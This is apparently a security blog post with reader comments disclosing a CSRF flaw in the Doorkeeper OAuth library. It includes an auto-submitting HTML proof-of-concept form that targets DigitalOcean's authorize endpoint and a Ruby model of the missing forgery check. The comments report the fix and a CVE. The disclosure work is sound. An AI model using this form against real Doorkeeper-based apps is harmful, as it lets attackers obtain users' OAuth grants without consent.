DigitalOcean uses Doorkeeper, the most popular OAuth provider library for Rails apps; it manages clients, tokens, scopes and validations out of the box.
Then I looked into Doorkeeper's commit history... it turns out Doorkeeper's endpoints never had CSRF protection, because its controllers inherit directly from ActionController::Base, not from the app's ApplicationController (which is where a Rails app normally declares protect_from_forgery).
Which means any HTML page on the Internet can get your access_token with arbitrary scope (such as "email", "dialogs" or "withdraw_money") from any Doorkeeper-based Rails app you are logged in to. Example:
<form action="https://cloud.digitalocean.com/v1/oauth/authorize?response_type=code" method="POST">
<input name="client_id" value="EVIL_APP_ID" />
<input name="redirect_uri" value="http://CALLBACK" />
<input name="scope" value="ANY SCOPE" />
</form><script>document.forms[0].submit()</script>
This is a big deal. You must upgrade Doorkeeper NOW.
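To make the failure mode concrete, here is an added, self-contained model of the authorize endpoint (my own illustration, not Doorkeeper's code): with the forgery check off, the cross-site form above is accepted; with a Rails-style session-bound authenticity_token check, it is rejected. Names such as AuthorizeEndpoint and post_authorize are assumptions for this example.

```ruby
require 'securerandom'

# Hypothetical stand-in for POST /oauth/authorize (not Doorkeeper's real class).
class AuthorizeEndpoint
  def initialize(protect_from_forgery:)
    @protect_from_forgery = protect_from_forgery
    @session = { user_id: 42 }            # constructed: a logged-in user
  end

  # Rails keeps the anti-forgery token in the session and renders it into
  # same-origin forms only; a form on an attacker's site cannot read it.
  def csrf_token
    @session[:_csrf_token] ||= SecureRandom.base64(32)
  end

  # Returns a Rack-like result hash instead of rendering a response.
  def post_authorize(params)
    unless forgery_check_passes?(params)
      return { status: 422, error: 'invalid authenticity token' }
    end
    code = SecureRandom.hex(8)            # would be persisted in a real app
    { status: 302,
      location: "#{params['redirect_uri']}?code=#{code}",
      scope: params['scope'] }
  end

  private

  def forgery_check_passes?(params)
    # Controllers inheriting straight from ActionController::Base behave
    # like this branch: every POST is trusted, whatever its origin.
    return true unless @protect_from_forgery
    presented = params['authenticity_token'].to_s
    return false if presented.empty?
    secure_compare(presented, csrf_token)
  end

  # Constant-time comparison so token checking does not leak via timing.
  def secure_compare(a, b)
    return false unless a.bytesize == b.bytesize
    a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end
end
```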
P.S. It's funny that Sergey is not a Rails developer, so he simply tried to send a request without an authenticity_token. Frankly, I wouldn't have tried that: Rails has built-in CSRF protection everywhere, why even bother? That's why.
P.S. 2: It's a bit disappointing that neither the DigitalOcean nor the Doorkeeper (Applicake?) team announced such a severe vulnerability, so I'm doing it for them.
Thanks again for the research Egor!
I have nothing to do with this - it's Sergey who found it. He just didn't realize at first what a big bug he spotted.
Big thanks to Sergey for reporting it responsibly! Just to be clear, this was fixed on DigitalOcean. One of our engineers reported and fixed this in upstream Doorkeeper as well.
The info for contacting our security team can be found here:
https://www.digitalocean.com/security/
maybe bold/highlight/spotlight "This is a big deal. You must upgrade Doorkeeper NOW." ?
In which version of Doorkeeper was this actually fixed?
I haven't checked, but as per Andrew above 'upstream' would be the 'master' branch. It'll get tagged in the latest release, if it hasn't already been done. Check the changelog.
Thanks Egor for the post ;)
Can confirm that it's fixed now - https://github.com/doorkeeper-gem/doorkeeper/commit/c1b5c45e2c42c0191ca9f12a2836e31ee1a8de57
Looks like it was assigned a CVE http://seclists.org/oss-sec/2014/q4/1076